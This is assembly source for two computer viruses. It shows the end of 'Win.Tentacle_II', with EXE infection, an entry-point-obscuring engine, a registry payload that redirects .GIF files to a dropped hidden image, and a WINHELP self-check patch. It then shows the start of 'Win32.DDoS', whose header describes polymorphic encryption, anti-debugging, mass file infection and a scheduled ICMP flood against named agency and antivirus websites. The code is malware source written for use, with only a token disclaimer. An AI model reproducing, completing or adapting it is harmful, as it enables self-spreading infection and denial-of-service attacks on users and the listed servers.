mov ax , 3000h ; AX=5701h - set file date and timeadd ax , 2701h
mov bx ,[ bp.dest_handle ] ; BX=handle of victim filemov dx ,[ bp.file_date ] ; CX=old file datemov cx ,[ bp.file_time ] ; DX=old file time
int 21h
mov ah, 3Eh ; close victim fileint 21h
mov bx ,[ bp.source_handle ] ; BX=handle of temp filemov ah, 3Eh ; close temp file
int 21h
lea dx ,[ bp.tmp_filename ] ; DS:DX=pointer to temp file namemov ah, 41h ; delete temp file
int 21h
clc ; clear carry flag (indicate success)JMP exit_infect
close_tmp_file :mov bx ,[ bp.dest_handle ] ; BX=handle of temp filemov ah, 3Eh ; close temp file
int 21h
delete_tmp_file :lea dx ,[ bp.tmp_filename ] ; DS:DX=pointer to temp file namemov ah, 41h ; delete temp file
int 21h
close_file :
mov bx ,[ bp.source_handle ] ; BX=handle of victim filemov ah, 3Eh ; close fictim file
int 21h
stc ; set carry flag (indicate error)
exit_infect :popad ; restore all 32bit registersRET
C_win311 db "C:\WIN311\", 0
; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE --------------------------
get_file_date_time_size :push cx ; save CX and DX
push dx
mov ax , 5700h ; get date and timeint 21h
mov [ bp.file_date ], dx ; save datemov [ bp.file_time ], cx ; save time
xor cx , cx ; CX:DX=0 (distance to move)xor dx , dxmov ax , 4202h ; move filepointer relative toint 21h ; end of file
; in DX:AX the new filpointer is; returned (filesize in this case)
mov word ptr [ bp.file_size +2], dx ; save filesizemov word ptr [ bp.file_size ], ax
xor cx , cx ; DX:CX=0 (distance to move)xor dx , dxmov ax , 4200h ; move filepointer relative toint 21h ; beginning of file
pop dx ; restore DX and CXpop cx
RET
C_win95 db "C:\WIN95\", 0
; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FIL E ------------------------
copy_file_block :pushad ; save all 32bit registers
sub sp , 256 ; allocate a 256 byte buffer from stackmov [ bp.bytes_to_copy ], ecx ; save length of block to copymov dx , sp ; DX=offset buffer
copy_file_block_loop :cmp [ bp.bytes_to_copy ], 0 ; whole block moved?JE copy_file_block_done ; then we're donecmp [ bp.bytes_to_copy ], 256 ; more than 256 bytes left?JBE copy_remaining_bytes_block
mov cx , 256 ; then just copy 256 bytesJMP read_file_block
copy_remaining_bytes_block :mov cx ,word ptr [ bp.bytes_to_copy ] ; copy all bytes left
read_file_block :push cx ; save size to read/writemov bx ,[ bp.source_handle ] ; BX=handle of source filemov ah, 3Fh ; read from file functionpush ds ; save DSpush ss ; DS=SS
pop dsint 21h
pop ds ; restore DSmov bx ,[ bp.dest_handle ] ; BX=handle of destination filemov cx , ax ; write as many bytes as were readmov ah, 40h ; write block to temporary filepush ds ; save DSpush ss ; DS=SS
pop dsint 21h
pop ds ; restore DScmp cx , ax ; sizes of read block=written block ?pop cx ; restore size to read and writeJNZ copy_file_block_error ; if not equal, then an error occuredcmp cx , ax ; size of read/written block equal
; to the size we planned to read?JNE copy_file_block_done ; if not, we're at the end of the file
cwde ; convert word to dword (AX->EAX)sub [ bp.bytes_to_copy ], eax ; we've copied EAX bytes moreJMP copy_file_block_loop ; copy next file block
copy_file_block_error :stc ; set carry flag (indicate error)JMP copy_file_block_ret
copy_file_block_done :clc ; clear carry flag (indicate success)add sp , 256 ; remove buffer from stackpopad ; restore all 32bit registers
copy_file_block_ret :RET
; ----- SEARCH MODULE NAME ------------------------ --------------------------;; searches the module name pointed to by DX in the imported names table and; returns in AX its number, otherwise indicates err or with carry flag set
search_module_name :push bx ; save BXpush es ; save ES
sub sp , 256 ; reserve a 256 bytes buffer on stackmov di , dx
push ss ; ES=SS
pop es
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.rw_buffer +28h ] ; ptr to module-reference
; table (from NE header)add eax ,[ bp.new_header_offs ] ; EAX=ptr to module-reference table
; (from file start)
push eax ; CX:DX=EAXpop dxpop cx
mov ax , 4200h ; set file pointer relative to; file start to module reference table
int 21hJC module_name_not_found
mov ah, 3Fh ; read module reference tablemov cx ,word ptr [ bp.rw_buffer +1Eh] ; number of entries in
; module reference tableshl cx , 1 ; multiply with two (each entry
; in module reference table is a word)mov dx , sp ; DS:DX=ptr to our buffer on stack
int 21hJC module_name_not_found
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.rw_buffer +2Ah] ; ptr to imported-names table
; (relative to NE header)add eax ,[ bp.new_header_offs ] ; EAX=ptr to imported-names table
; relative to file start
push eax ; CX:DX=EAXpop dxpop cx
mov ax , 4200h ; set file pointer relative to; file start to imported-names table
int 21hJC module_name_not_found
mov ah, 3Fh ; read imported-names tablemov cx , 128 ; read 128 bytesmov dx , sp ; DS:DX=ptr to buffer on stackadd dx , 128 ; assume module-reference table is
; not longer than 128 bytes tooint 21h
JC module_name_not_found
mov bx , sp ; BX=module-reference table bufferxor cx , cx ; CX=0JMP check_if_all_modules_done
search_module_name_loop :mov si , sp ; SI=buffer on stackadd si , 128 ; SI=imported-names table bufferadd si ,[ bx ] ; add offset from module-reference
; table to get a actual entry in the; imported-names table
push cx ; save CX (module counter)push di ; save DI (offset of module name
; to search for)
xor ch , ch ; CH=0
mov cl ,[ si ] ; length of this entry in the; imported-names table
inc cl ; also compare the string-length bytecld ; clear direction flagrepe cmpsb ; compare the strings
pop di ; restore DI (offset of module name; to search for)
pop cx ; restore CX (module counter)
JZ found_module_nameinc cx ; incerement CX (module counter)add bx , 2 ; go to next entry in module-
; reference tablecheck_if_all_modules_done :
cmp cx ,word ptr [ bp.rw_buffer +1Eh] ; done all modules ?JNE search_module_name_loop ; if not, search onJMP module_name_not_found ; if yes, the search failed
found_module_name :mov ax , cx ; AX=module counterinc ax ; make counter start from 1add sp , 256 ; remove buffer from stackclc ; clear carry flag (indicate success)JMP exit_search_module_name
module_name_not_found :add sp , 256 ; remove buffer from stack
stc ; Set carry flag
exit_search_module_name :pop es ; restore ESpop bx ; restore BXRET
; ----- EPO ENGINE -------------------------------- --------------------------;; Entry: none;; Exit:; EAX - module index (in MSW) and API ordinal (in L SW) of found reloc item; EDX - file offset of relocation item to modify
EPO:
; create the string 6, "KERNEL" in tmp_buffer
mov dword ptr [ bp.tmp_buffer +4], 5AD5762Dhmov dword ptr [ bp.tmp_buffer +0], 0F220B44Bhadd dword ptr [ bp.tmp_buffer +0], 602496BBhadd dword ptr [ bp.tmp_buffer +4], 0A576CF21hlea dx ,[ bp.tmp_buffer ] ; DX=pointer to 6, "KERNEL"CALL search_module_nameJC check_VBrunmov dx , 5Bh ; ordinal of InitTask APIJMP search_API_reference
check_VBrun :; create the string 8, "VBRUN300" in tmp_buffermov dword ptr [ bp.tmp_buffer +4], 9062F740hmov dword ptr [ bp.tmp_buffer +0], 0EDC4FE68h
mov byte ptr [ bp.tmp_buffer +8], "0"add dword ptr [ bp.tmp_buffer +4], 9FD05715hadd dword ptr [ bp.tmp_buffer +0], 647D57A0hlea dx ,[ bp.tmp_buffer ] ; Load effective addrCALL search_module_nameJC end_EPOmov dx , 64h ; ordinal of THUNRTMAIN API
search_API_reference :push ax ; save AX (module index)push dx ; save DX (API function ordinal)
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.rw_buffer +22h ] ; segment table offset
; (relative to NE header)add eax ,[ bp.new_header_offs ] ; EAX=segment table offset (relative
; to file start)xor ecx , ecx ; ECX=0mov cx ,word ptr [ bp.rw_buffer +16h ] ; entry code segment indexdec cx ; make segment counter start at zeroshl ecx , 3 ; multiply with 8 (segment table
; entry size)add eax , ecx ; EAX=offset of entry code segment
; descriptor (from filestart)push eax ; CX:DX=EAX
pop dxpop cx
mov ax , 4200h ; go to descriptor of entry code segmint 21h
pop dx ; restore DX (API function ordinal)pop ax ; restore AX (module index)JC end_EPOmov cl ,byte ptr [ bp.rw_buffer +32h ] ; CL=alignemt shift
push bp ; save BP (main data stack frame)sub sp , size EPO_stack_frame ; create new data buffer on stackmov bp, sp ; and set BP to it
push cx ; save CX (alignemt shift)mov [ bp.module_index ], ax ; save module indexmov [ bp.API_ordinal ], dx ; save API function ordinal
mov ah, 3Fh ; read entry code segment descriptormov cx , 8 ; size of a segment descriptorlea dx ,[ bp.entry_CS_offset ] ; DS:DX=pointer to read buffer
int 21hpop cx ; restore CX (alignment shift)JC EPO_failed
xor edx , edx ; EDX=0mov dx ,[ bp.entry_CS_offset ] ; EDX=segment file offset (aligned)shl edx , cl ; EDX=segment file offset (in bytes)xor eax , eax ; EAX=0mov ax ,[ bp.entry_CS_phys ] ; EAX=segment physical sizeadd edx , eax ; EDX=file offset of segment relocsmov [ bp.entry_CS_relocs ], edx ; save it
push edx ; CX:DX=EDXpop dxpop cx
mov ax , 4200h ; go to entry code segment relocationsint 21h
JC EPO_failed
mov ah, 3Fh ; read number of relocation itemsmov cx , 2 ; read one wordlea dx ,[ bp.relocs_number ] ; DS:DX=pointer to read buffer
int 21hJC EPO_failed
xor ecx , ecx ; ECX=0JMP check_if_all_relocs_done
search_API_reference_loop :push cx ; save CX
mov ah, 3Fh ; read a relocation itemmov cx , 8 ; size of relocation itemlea dx ,[ bp.reloc_type ] ; DS:DX=ptr to read bufferint 21h
pop cxJC EPO_failed
mov eax ,dword ptr [ bp.module_index ] ; EAX=module index and; API ordinal
cmp [ bp.reloc_what ], eaxJNE check_next_reloccmp word ptr [ bp.reloc_type ], 103h ; check relocation type: must
; be 32bit far ptr and API ordinalJE found_API_reference
check_next_reloc :inc cx
check_if_all_relocs_done :cmp cx ,[ bp.relocs_number ]JNE search_API_reference_loopJMP EPO_failed
found_API_reference :mov edx ,[ bp.entry_CS_relocs ]
add edx , 2shl ecx , 3 ; ECX=ECX*8 (size of a reloc item)add edx , ecx ; EDX=offset of reloc item in filemov eax ,dword ptr [ bp.module_index ] ; EAX=module index/API ordinal
add sp , size EPO_stack_frame ; clear buffer from stackpop bp ; restore old stack frame pointerclc ; clear carry flag (indicate success)JMP end_EPO
EPO_failed :add sp , size EPO_stack_frame ; clear buffer from stack
pop bpstc ; set carry flag (indicate error)
end_EPO:RET
gif_body :include gif.inc ; the body of the gif file converted
; to DB instructionsgif_body_size EQU ($ - offset gif_body )
shell_open_command db "\SHELL\OPEN\COMMAND", 0l_shell_open_command EQU ($ - offset shell_open_command )
; ----- PAYLOAD ----------------------------------- --------------------------
payload :push es ; save ESpush bp ; save BP (main stack frame pointer)
sub sp , size payload_stack_frame ; reserve room on stackmov bp, sp ; setup new stack frame
push ax ; save AX (what to do flag)
;* push dword ptr 1 ; HKEY_CURR ENT_USERdb 66h , 68h , 1, 0, 0, 0 ; fixup - byte match
mov word ptr [ bp.reg_buffer2 ], "G." ; name of the subkey: ".GIF",0mov dword ptr [ bp.reg_buffer2 +2], "FI"push ss ; push a far pointer to the namelea ax ,[ bp.reg_buffer2 ] ; of the subkey
push ax
push ss ; push a far pointer to the bufferlea ax ,[ bp.reg_buffer1 ] ; that will hold the return string
push ax
mov [ bp.size_reg_buffer ], 40h ; size of buffer for return stringpush ss ; push a far pointer to thelea ax ,[ bp.size_reg_buffer ] ; dword that holds the size for thepush ax ; return string
CALL cs : RegQueryValue ; far call to the RegQueryValue API
or ax , ax ; zero means successJZ RegQueryValue_successpop ax ; clear stackJMP exit_payload
RegQueryValue_success :cmp byte ptr [ bp.reg_buffer1 ], 0; has it returned an empty string?JE try_shell_open_command
push ss ; ES=SSpop es
lea di ,[ bp.reg_buffer1 ] ; DI=offset retrun stringcld ; clear direction flagxor al , al ; AL=0mov cx , 0FFFFh ; CX=maximal wordrepne scasb ; search for the end of the stringdec di ; DI points now to the terminating 0
push ds ; save DSpush cs ; DS=CS
pop ds
mov si , offset shell_open_commandCALL decrypt_path ; decrypt & append it to the result
; of the RegQueryValue call
pop ds ; restore DSCALL call_RegQueryValueor ax , ax ; zero means successpop ax ; restore AX (entry flag)JZ RegQueryValue_success2
try_shell_open_command :mov word ptr [ bp.reg_buffer1 ], "G."mov dword ptr [ bp.reg_buffer1 +2], "FI"
push ds ; save DS
push cs ; DS=CSpop ds
push ss ; ES=SSpop es
mov si , offset shell_open_commandlea di ,[ bp.reg_buffer1 +4] ; Load effective addrmov cx , l_shell_open_command ; useless, the decrypt_path procedure
; gets the string length itself.CALL decrypt_pathpop ds ; restore DSCALL call_RegQueryValueor ax , ax ; zero means success
pop axJNZ exit_payload
RegQueryValue_success2 :; reg_buffer2 contains now the commandline of the p rogram that is; runned whenever the user doubleclics on a .GIF fi le
or ax , ax ; check the entry flag in AXJZ restore_gif_commandline
push ss ; ES=SSpop es
lea di ,[ bp.reg_buffer2 ] ; DI=pointer to commandline connected; with .GIF files
push di ; save DIxor al , al ; AL=0mov cx , 0FFFFh ; CX=maximal wordrepne scasb ; search for the end of the stringdec di ; DI points now to the terminating 0mov ax , di ; AX=end of stringpop di ; restore DI (start of string)sub ax , di ; AX=length of stringmov cx , ax ; CX=length of stringmov al , "%" ; search the commandline for where
; the name of the gif will be on; program start
cld ; clear direction flagrepne scasb ; search for the % signJNZ exit_payload ; if not found, exit payloadcmp byte ptr [ di ], "1" ; is it the %1, like it has to be?JNE exit_payload ; if not, something is wrongcmp byte ptr [ di - 2], '"' ; is there the quotes sign?JNE dont_skip_quotesdec di ; if yes, skip it
dont_skip_quotes :dec di ; go to the start of the first
; parameter in the commandline, the
; name of the .GIF file
mov dword ptr [ di +9], "G.EL" ; create there the "C:\TENTACLE.GIF"mov byte ptr [ di ], "C" ; string
mov dword ptr [ di +5], 7E00FD39hmov dword ptr [ di +0Dh], "FI"
add dword ptr [ di +5], 0C5405715hmov dword ptr [ di +1], "ET\:"push di ; save DI (offs of "C:\TENTACLE.GIF")CALL call_RegSetValue ; set the new value.
; from now on, everytimes the user doubleclicks on a gif file, it; will only see C:\TENTACLE.GIF ;-)
mov ah, 3Ch ; create C:\TENTACLE.GIF filemov cx , 7 ; readonly,hidden,system attributespop dx ; DS:DX=ptr to filename to create
; ("C:\TENTACLE.GIF")int 21h
JC exit_payload
mov bx , ax ; handle to BX
mov word ptr [ bp.reg_buffer2 +2], "8F" ; create GIF marker in themov word ptr [ bp.reg_buffer2 +0], "IG" ; buffer ("GIF87a")mov word ptr [ bp.reg_buffer2 +4], "a7"
mov ah, 40h ; write GIF markermov cx , 6 ; size of gif markerlea dx ,[ bp.reg_buffer2 ] ; DS:DX=pointer to write buffer
int 21h
mov ah, 40h ; write gif file bodymov cx , gif_body_size ; size to writemov dx , offset gif_body ; DS:DX=pointer to write bufferpush ds ; save DSpush cs ; DS=CS
pop dsint 21h
pop ds ; restore DS
mov ah, 3Eh ; close fileint 21h
JMP exit_payload ; payload is done
restore_gif_commandline :push ss ; ES=SS
pop eslea di ,[ bp.reg_buffer2 ] ; DI=pointer to commandline connected
; with .GIF filescld ; clear direction flagpush di ; save DIxor al , al ; AL=0mov cx , 0FFFFh ; CX=maximal wordrepne scasb ; search for the end of the stringdec di ; DI points now to the terminating 0mov ax , di ; AX=end of stringpop di ; restore DI (start of string)sub ax , di ; AX=length of string
add di , axmov cx , ax ; CX=length of string
mov al , " " ; search for the blankstd ; set direction flagrepne scasb ; search for the end of the filenameJNZ exit_payload ; if not found, exitadd di , 2 ; go to 1st param (file to display)cmp byte ptr [ di ], "C" ; is there "C:\TENTACLE.GIF"JNE exit_payload ; if not, there's nothing to restorecmp dword ptr [ di +1], "ET\:" ; make really sureJNE exit_payloadmov byte ptr [ di ], "%" ; restore the correct cmdline "%1"mov word ptr [ di +1], "1"CALL call_RegSetValue ; set it.
exit_payload :add sp , size payload_stack_frame ; free room on stackpop bp ; restore BP (main stack frame ptr)pop es ; restore ESRET
call_RegQueryValue :;* push dword ptr 1 ; HKEY_CURR ENT_USER
db 66h , 68h , 1, 0, 0, 0 ; fixup - byte match
push ss ; push a far pointer to the namelea ax ,[ bp.reg_buffer1 ] ; of the subkey
push ax
push ss ; push a far pointer to the bufferlea ax ,[ bp.reg_buffer2 ] ; that will hold the return string
push ax
mov [ bp.size_reg_buffer ], 40h ; size of buffer for return stringpush ss ; push a far pointer to thelea ax ,[ bp.size_reg_buffer ] ; dword that holds the size for thepush ax ; return string
CALL cs : RegQueryValue ; far call to the RegQueryValue API
RET
call_RegSetValue :;* push dword ptr 1 ; HKEY_CURR ENT_USER
db 66h , 68h , 1, 0, 0, 0 ; fixup - byte match
push ss ; push a far pointer to the namelea ax ,[ bp.reg_buffer1 ] ; of the subkey
push ax
;* push dword ptr 0 ; REG_SZ (A SCIIZ string)db 66h , 68h , 1, 0, 0, 0 ; fixup - byte match
push ss ; push a far pointer to the bufferlea ax ,[ bp.reg_buffer2 ] ; that will hold the return string
push ax
;* push dword ptr 0 ; size of v alue datadb 66h , 68h , 0, 0, 0, 0 ; fixup - byte match
CALL cs : RegSetValue ; far call to the RegSetValue API
RET
; ----- PATCH WINHELP ----------------------------- --------------------------
patch_winhelp :cmp word ptr [ bp.rw_buffer +1Ch], 2 ; number of segmentsJB exit_patch_winhelp ; it's not the WINHELP.EXE
; we know, don't patch it
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.rw_buffer +22h ] ; offset of segment table
; (relative to NE header)add eax ,[ bp.new_header_offs ] ; now relative to file start
;* add eax,8 ; g o to 2nd segment descriptordb 66h , 83h , 0C0h, 08h ; fixup - byte match
push eax ; CX:DX=EAXpop dxpop cx
mov ax , 4200h ; set filepointer to theint 21h ; descriptor.
mov ah, 3Fh ; read the aligned segment file offsetmov cx , 2 ; read one wordlea dx ,[ bp.tmp_buffer ] ; DS:DX=pointer to read buffer
int 21h
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.tmp_buffer ] ; EAX=aligned segment file offsetmov cl ,byte ptr [ bp.rw_buffer +32h ] ; CL=alignment shiftshl eax , cl ; EAX=segment file offset in bytes
;* add eax,22h ; go to off set 22h in 2nd segmentdb 66h , 83h , 0C0h, 22h ; fixup - byte match
push eax ; CX:DX=EAXpop dxpop cx
mov ax , 4200h ; set filepointer to offset 22h inint 21h ; the second segmentJC exit_patch_winhelp
mov ah, 3Fh ; read two bytes of program codemov cx , 2 ; size to readlea dx ,[ bp.tmp_buffer ] ; DS:DX=pointer to read buffer
int 21hJC exit_patch_winhelp
cmp word ptr [ bp.tmp_buffer ], 1474h ; is it a JE $+16h ?JNE exit_patch_winhelp ; if not, it's not the WINHELP.EXE
; we know, don't patch it.
mov ax , 4201h ; set filepointer back to the; conditional jmp
mov cx ,- 1 ; CX:DX=-2mov dx ,- 2
int 21h
mov byte ptr [ bp.tmp_buffer ], 0EBh ; a unconditional JMP SHORT
mov ah, 40h ; patch the file with the; unconditional JMP
mov cx , 1 ; write one bytelea dx ,[ bp.tmp_buffer ] ; DS:DX=pointer to the write buffer
int 21h
; WINHELP.EXE now has no self-check; any more ;-)
exit_patch_winhelp :RET
db 3 dup ( 0) ; maybe the author wanted the; relocation addresses on an address; divisible by 4 ?
RegQueryValue dd 0000FFFFhRegSetValue dd 0000FFFFhorg_entry dd 0000FFFFh
virus_end :
; Most data of the virus is stored in a buffer on t he stack. The following; structure represents the lay-out of this stack fr ame:
stack_frame strucdta db 2Bh dup (?)tmp_buffer db 10 dup (?)bytes_to_copy dd ?full_filename db 24 dup (?)full_filespec db 24 dup (?)tmp_filename db 16 dup (?)source_handle dw ?dest_handle dw ?file_date dw ?file_time dw ?file_size dd ?new_header_offs dd ?end_of_NE_hdr dd ?alignment_unit dd ?first_segm_offs dd ?new_sect_descr dw 4 dup (?)rw_buffer db 64 dup (?)
dw ?our_reloc_offs dd ?module_ordinal dd ?new_entry_CS dw ?new_entry_IP dw ?stack_frame ends
; The data that is used in the EPO engine of the vi rus uses another stack; frame that is represented in this structure:
EPO_stack_frame strucentry_CS_offset dw ?entry_CS_phys dw ?entry_CS_flags dw ?entry_CS_virt dw ?reloc_type dw ?reloc_offs dw ?reloc_what dd ?module_index dw ?API_ordinal dw ?entry_CS_relocs dd ?relocs_number dw ?
EPO_stack_frame ends
; Also the payload routine uses its own stack frame :
payload_stack_frame strucreg_buffer1 db 40h dup (?)reg_buffer2 db 40h dup (?)size_reg_buffer dd ?payload_stack_frame ends
first_gen_entry :push ds ; save DSpusha ; save all registers
push ss ; DS=SSpop ds
sub sp , size stack_frame ; reserve room on stackmov bp, sp ; setup stack frame
mov ah, 1Ah ; set DTA to DS:DXlea dx ,[ bp.dta ] ; Load effective addrint 21h
mov si , offset exe_wildcard ; encrypt all the strings in thecall encrypt_wildcard ; virus by a simple inc/decmov si , offset scr_wildcard ; algorithmcall encrypt_wildcard
mov si , offset C_wincall encrypt_pathmov si , offset C_windowscall encrypt_pathmov si , offset C_win31call encrypt_pathmov si , offset C_win311call encrypt_pathmov si , offset C_win95call encrypt_pathmov si , offset shell_open_commandcall encrypt_path
mov bx , 0FFFFhmov cx , offset empty_stringmov dx , offset exe_wildcardCALL infect_directory ; infect all EXE files in current dir
mov ah, 9mov dx , offset first_gen_messageint 21h
mov ax , 4C00hint 21h
first_gen_message db "Win.Tentacle_II virus dropped" , 0Dh, 0Ah, "$"
end first_gen_entry
;; ************************************************* **************************; -----------------[ Win32.DDoS by SnakeByte { Kryp toCrew } ]----------------; ************************************************* **************************;;;; Please note that it is illegal to spread viruses, so if you compile this; code, just test it on a closed system and don't p lace it in the wild !; I am not responsible for your actions .. as alway s ;);;;;; This is the first Windows Virus I've written so f ar, and some parts are from; Win32.Aztec by Billy Beleceb, because at the time i wrote this thing, not everything; was clear in my mind, as it is now, hope I can pr esent you some better things from me; in the future.;; This is also my first polymorphic virus ever ;) s o don't expect too much from the; poly engine. I did not understand much of the cod e from other poly engines, but; now, after coding one on my own, I do, so I maybe can code a better one the next time ;);; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...; and try to keep track that they don't look comple tely useless. ; I also use several ways to decrypt the virus ( xo r, neg, not .. ) and; several methods to do the loop. The size will alw ays be in ECX and ; the start in ESI, but i use several methods to pu t the values inside; the registers so there is nothing static.; The only static thing left is the call to the pol ymorphic decryptor ;(;;; I was just able to test this thing on a Win95 PC, so I don't know if it will; work on other systems, but I think it will. Two f riends made some tests under; NT and 2k with a beta, and it worked, so I hope t his final version will also do.;;; It tries to get the 4 following API's:;; - Kernel32.dll <- the only one we really need to work, the others are for fun ;; - Imagehlp.dll <- try to create a valid C RC for the PE-Header of infected files; - Advapi32.dll <- get some data from the registry; - Winsck32.dll <- Payload : Ping-flood a server;;;;; What does this Virus do :;; - 1.st Generation infects just the current dire ctory ( easier to infect just some files *eg* ); - Get's API's with LoadLibraryA & GetProcAddres s; - Tries to load ImageHlp.dll to create checksum s with the CheckSumMappedFile Function; - Infects the current, the windows and the syst em directory and parses some ; random directory's on drive C:; - Follows LNK - Files ( does not work with NT / 2k ); - Removes and restores File-Attributes; - Parses Drive C:, enters a folder with a chanc e of 1 to 3; - Retrieves the Startmenue from registry and pa rses it ( follows LNK-Files there ) ; - If everything runs well it will infect 100 fi les all over the disk; - Generates a polymorph decryptor which will be used for all files infected in one run; - Uses 2 layers of decryption ( 1st is poly, 2n d is harder to debug / emulate )
; - Does not infect files smaller than 40 kb; - Will not infect files with AV, AN or DR in th e filename; - Payload is a icmp flood on one of these serve rs :;; Sunday = www.bundesnachrichtendienst.de; Monday = French Secret Service ( dgse.cit eweb.net ); Tuesday = www.avp.com ( AV ); Wednesday = www.lockdown2000.com; Thursday = www.f-secure.com ; Friday = www.norton.com; Saturday = www.zonelabs.com;; *# Please note that i choose these servers becau se I think they can #*; *# handle such an attack, if any idiot would rel ease this into the wild. #*;;;;;;; To make this code working use TASM 5.0 an d pewrsec.; ;;;;;; Thanks and greetz fly to these people:;; Billy Beleceb - Your Win32 VWG is just great ..; ( you'll find some of your c ode [Win32.Aztec] here ;); Evul - Thanks for hosting my site a t coderz.net; Ciatrix - Hope you carry on your good work with VDAT !; SnakeMan - Hope you get more entrys *g* --> http://altavirus.cjb.net; PhilippP - Thanks for the thrilling tes t in 2k .. ;); BumbleBee - Still thinking of Sex ?; diediedie - Thnx for demotivating me... :); asmodeus - nice beginner lesson in poly ;); darkman - just believe me: the questio n was stupid ;);;;;;; ************************************************* **************************; ---------------------------[ Here we start ]----- --------------------------; ************************************************* **************************
.586p
.model flatjumps ; Jumps get calculated
; ( I know not good for optimizing.. ).radix 16 ; All numbers are Hexadecimal
; I once searched for a forgotten 'h'; 2 weeks until I found this bug.. :P
; some API'sextrn ExitProcess : PROC ; fake host for 1. Generation
extrn MessageBoxA : PROC ; For testing purposes ( no longer needed ); but i needed it for error-detection *g*; 'cause I am too stupid to work with softice.. :(
.data ; fake data for TASMdb ? ; otherwise TASM would not compile this
; we store all our data in the code; section, that's why we need to use; pewrsec after compiling, to set the ; code section flags to write !
; some constants I don't want to calculate on my ow n *g*VirusSize equ ( offset VirusEnd - offset Virus )CryptSize equ ( offset VirusEnd - offset CryptStart )NoCrypt equ ( offset CryptStart - offset Virus )FirstLSize equ ( offset VirusEnd - offset FirstLayerStart )Buffersize equ ( offset EndBufferData - offset VirusEnd )
FILETIME STRUCFT_dwLowDateTime dd ?FT_dwHighDateTime dd ?FILETIME ENDS
.code
; ************************************************* **************************; -------------[ Delta Offset and searching for the Kernel Addy ]------------; ************************************************* **************************
Virus : ; Here we go
call PDecrypt ; call the poly decryption routine; which is located at the end of virus; just a simple 'ret' in the first generation
FirstLayerStart : ; here starts the first layer; everything will be crypted from here on
call Delta ; let's get the delta - offset
Delta :mov ebp , offset Delta ; I want to do this a bit differentneg ebp ; than usual, who knows, maybe thispop eax ; fools some bad heuristicsadd ebp , eax
or ebp , ebp ; we don't need to decrypt the 1.jz CryptStart ; Generation
; save espmov dword ptr [ ebp+XESP], esp
mov ecx , ( CryptSize / 2) ; the lenght of crypted part in wordsmov dx , word ptr [ ebp+Key]lea esp , [ ebp+CryptStart ] ; set esp to the start of the decrypted part
DeCryptLoop : ; let's decrypt the viruspop ax ; we pop the body word by wordinc dx ; this method fucks with debuggers, whoxchg dl , dh ; trace with int 1h ( destroys stack )xchg al , ahxor ax , dxnot axpush axadd esp , 2h
loop DeCryptLoop; restore esp
mov esp , dword ptr [ ebp+XESP]
jmp CryptStart ; start virus
Key dw 0h ; our keyXESP dd 0h ; we save the esp here
db 4 dup ( 90h ) ; some nop's so we will not jump into a instruction; ( happened sometimes during testing :( ); because of the prefech queue buffer ( or whatever this is
spelled .. )CryptStart :
; we save these two values ( EIP & Imagebase ); to be able to return to the original host..
mov eax , dword ptr [ ebp+OldEIP ]mov dword ptr [ ebp+retEIP ], eaxmov eax , dword ptr [ ebp+OldBase ]mov dword ptr [ ebp+retBas ], eax
mov eax , dword ptr fs :[ 0] ; save the original SEHmov dword ptr [ ebp+SEH_Save], eax
mov esi , [ esp ] ; let's get the return address of the Create Proces s APIxor si , si ; round it to a full page
push dword ptr [ ebp+Error_ExecuteHost ]mov fs :[ 0], esp ; set new SEH
call GetKernel ; try to get itjnc GetApis ; If got it we try to retrieve the API's
; Otherwise, we try to check for; the kernel at some fixed addresses; But the way above should work most; of the times.. :)
mov esi , 0BFF70000h ; try the Win95 Kernel Addycall GetKerneljnc GetApis
mov esi , 077F00000h ; try the WinNT Kernel Addycall GetKerneljnc GetApis
mov esi , 077e00000h ; try the Win2k Kernel Addycall GetKerneljnc GetApis
; if we still did not found thejmp Error_ExecuteHost ; kernel we stop the virus
; and execute the goat
; ************************************************* **************************; -------------------------[ let's get the API's ]- --------------------------; ************************************************* **************************
; These are the 2 API's we search in the Kernel; we need them to get all the others API's ; I prefer LoadLibraryA to GetModuleHandle, ; because it is no longer nessecairy, that the
; file we infect loads the dll files we need,; we load them on our own,... ;); This means, we can use almost any API we want to *eg*; LoadLibraryA also returns the Module-Handle, but; if it is not loaded it loads it ... bla.. ;P
LL db 'LoadLibraryA' , 0h ; we need these API's for searching..GPA db 'GetProcAddress' , 0h
GetApis : ; Offset of the Kernel32.dll PE-Header is in EAX
mov [ ebp+KernelAddy ], eax ; Save it mov [ ebp+MZAddy], ebx
lea edx , [ ebp+LL] ; Points to name of the LoadLibaryA - APImov ecx , 0Ch ; Lenght of Namecall SearchAPI1 ; search it.. mov [ ebp+XLoadLibraryA ], eax
; Save the Addy
xchg eax , ecx ; If we didn't get this API or the other one, we qu it !jecxz ExecuteHost ; thnx to Billy ;)
lea edx , [ ebp+GPA] ; Points to name of the GetProcAddress - APImov ecx , 0Eh ; Lenght of Namecall SearchAPI1mov [ ebp+XGetProcAddress ], eax
; Save the Addy
xchg eax , ecx ; check if we failedjecxz ExecuteHost ; ( thnx again, nice way of optimization *g* )
; Now we have our 2 nessecairy API'sjmp GetAPI2 ; and are able to get the others
; Yes I know this jmp is not very optimizing.. ;); But storing the data here helps me understanding; my code *bg*
; this dll is delivered with every versionKERNEL32 db 'Kernel32' , 0 ; of windows, so we will get it always ( ..most lik ely *g* )
; the virus relies on it
IMAGEHLP db 'Imagehlp' , 0 ; this dll is not nessecairily needed, but dll's wi ll; only get infected, if we are able to use the Chec kSumMappedFile; Function from this dll to create a checksum; it is delivered with win9x, NT and several compil ers.
ADVAPI db 'advapi32' , 0 ; this dll is neccessairy to retrieve the startmenu e folder; from registry, so we are able to follow the short cuts there
WSOCK db 'wsock32.dll' , 0; we need this one here to perform a ping; ( not needed for the virus, but the payload )
GetAPI2 : ; We get them, by grabbing the handles of; different DLL's first and use GetProcAddress; to locate the API's itself
; Let's get the Handles by calling; the LoadLibrary API.. :); if we fail to get the; Kernel32, we execute the ; original host
lea eax , [ ebp+KERNEL32]push eaxcall dword ptr [ ebp+XLoadLibraryA ]mov [ ebp+K32Handle ], eaxtest eax , eaxjz ExecuteHost
lea eax , [ ebp+IMAGEHLP]push eaxcall dword ptr [ ebp+XLoadLibraryA ]mov [ ebp+IHLHandle ], eax
lea eax , [ ebp+ADVAPI]push eaxcall dword ptr [ ebp+XLoadLibraryA ]mov [ ebp+ADVHandle ], eax
